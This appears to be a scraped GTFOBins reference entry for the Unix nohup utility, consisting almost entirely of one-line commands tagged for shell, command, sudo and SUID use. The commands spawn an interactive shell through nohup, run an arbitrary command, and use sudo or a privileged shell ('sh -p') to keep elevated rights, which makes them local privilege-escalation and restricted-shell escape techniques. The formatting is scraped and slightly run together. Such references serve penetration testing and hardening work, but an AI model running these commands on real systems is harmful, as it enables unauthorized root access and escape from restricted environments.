GTFOBins.github.io/_gtfobins/nohup.md
2021-01-11 12:31:54 +02:00

334 B

functions
shell command sudo suid
code
nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
code
COMMAND='/usr/bin/id' nohup "$COMMAND" cat nohup.out
code
nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
code
sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"